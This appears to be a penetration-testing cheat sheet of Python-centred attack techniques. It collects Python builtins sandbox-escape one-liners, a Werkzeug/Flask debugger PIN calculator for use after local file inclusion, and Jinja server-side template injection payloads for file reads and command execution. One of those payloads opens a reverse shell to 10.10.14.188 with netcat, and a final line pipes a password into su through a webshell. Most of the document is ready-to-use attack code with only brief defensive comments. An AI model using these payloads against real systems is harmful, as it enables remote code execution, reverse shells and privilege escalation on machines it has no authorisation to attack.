Python

Bypass when Python builtins are set to None

Python2

# Python 2: walks from a tuple to `object`, picks subclass #59 and reads `__import__` out of that
# instance's `_module.__builtins__`. The index is interpreter-build-specific (it assumes the
# subclass list is ordered the same way as on the author's build), but the lesson for defenders
# is general: `__import__` is reached through attribute traversal, never through the name
# `__builtins__`, so clearing builtins from a namespace is not a sandbox boundary.
().__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os').system('whoami')

Python3

# Python 3: instead of a fixed index, selects the subclass by name (`Pattern`) and reads
# `__import__` from its `__init__`'s module globals. This assumes `Pattern` is a pure-Python class
# (a C type's `__init__` would not carry `__globals__`) — version-dependent, so confirm on the
# interpreter in question. Same defender takeaway as the Python 2 variant: hiding `__builtins__`
# does not stop code that can walk the type hierarchy.
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('whoami')

QRCode from Terminal Output

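#!/usr/bin/env python2
"""Decode a QR code that a remote service draws into the terminal.

Flow: connect, read the banner up to the "[+]" marker (the QR code is
printed to our own terminal by the print below), screenshot that terminal,
decode the image with zbarimg, then hand the session back to the user.
The screenshot path is fixed; the terminal must be visible on screen.
"""
from pwn import *
from subprocess import check_output
import subprocess

SCREENSHOT = 'x.png'  # written by gnome-screenshot, read back by zbarimg

p = remote('host', 1234)
# Everything up to the marker is the rendered QR code; it has to be on
# screen before the screenshot is taken, hence the print first.
img = p.recvuntil("[+]")
print(img)
# Argument lists rather than shell strings: the filename is never parsed
# by a shell, so no quoting/injection concerns if it is ever parameterised.
subprocess.call(['gnome-screenshot', '-f', SCREENSHOT])
output = subprocess.check_output(['zbarimg', SCREENSHOT])
print(output)
p.interactive()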

Flask Debug Pin from LFI

Take the values for "probably_public_bits" from a stack trace (and "private_bits" from the host files noted in the script's comments), then run the script to compute the PIN.
import hashlib
from itertools import chain

# Re-derivation of the Werkzeug debugger PIN (the md5-based variant) from
# values readable on the host. The PIN is a deterministic hash of these
# facts, which is why a file-read primitive plus a debug-mode traceback is
# enough to recover it; the only real defence is never to expose debug mode.
# NOTE(review): later Werkzeug releases changed the hash function and how
# the machine id is assembled, so the constants below are version-specific.
probably_public_bits = [
    '',  # username
    'flask.app',  # modname
    'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python2.7/dist-packages/flask/app.pyc',  # getattr(mod, '__file__', None)
]

private_bits = [
    '345052358410',  # str(uuid.getnode()), /sys/class/net/ens33/address
    '258f132cd7e647caaf5510e3aca997c1',  # get_machine_id(), /etc/machine-id
]


def _as_bytes(bit):
    """Return *bit* as bytes, UTF-8 encoding text so it can be hashed."""
    return bit.encode('utf-8') if isinstance(bit, str) else bit


h = hashlib.md5()
# Empty bits (e.g. an unknown username) are skipped rather than hashed as ''.
for chunk in (b for b in chain(probably_public_bits, private_bits) if b):
    h.update(_as_bytes(chunk))
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

# The PIN digest continues from the cookie digest state with a second salt;
# the first nine decimal digits of the result form the raw PIN.
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

# Split into equal groups, preferring 5, then 4, then 3 digits per group;
# a length that fits none of them is printed as the bare digits.
rv = num
for group_size in (5, 4, 3):
    if len(num) % group_size == 0:
        pieces = (num[i:i + group_size].rjust(group_size, '0')
                  for i in range(0, len(num), group_size))
        rv = '-'.join(pieces)
        break

print(rv)

SSTI Jinja

Read File

{{ ''.__class__.__mro__[2].__subclasses__()[40]()(<file>).read()}}
{%include+request.application.__globals__.__builtins__[request.args.import](request.args.os).popen(request.args.cmd).read().__str__()%}&import=__import__&os=os&cmd=ls
?a=somevalue&name={%%20if%20session.update({request.args.a:%20True})%20%}{%endif%}
?a=os&b=ls&name={% if session.update({request.application.__globals__.__builtins__.__import__(request.args.a).popen(request.args.b).read(): True}) %}{%endif%}

RCE

{config.__class__.__init__.__globals__['os'].popen(<command>).read()}}
Alternative:
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("nc.traditional 10.10.14.188 2000 -e /bin/sh").read()}}{%endif%}{% endfor %}

Sneaky SU from Webshell

cmd=(sleep 1; echo password) | python3 -c "import pty; pty.spawn(['/bin/su','-c','whoami']);"

Resources
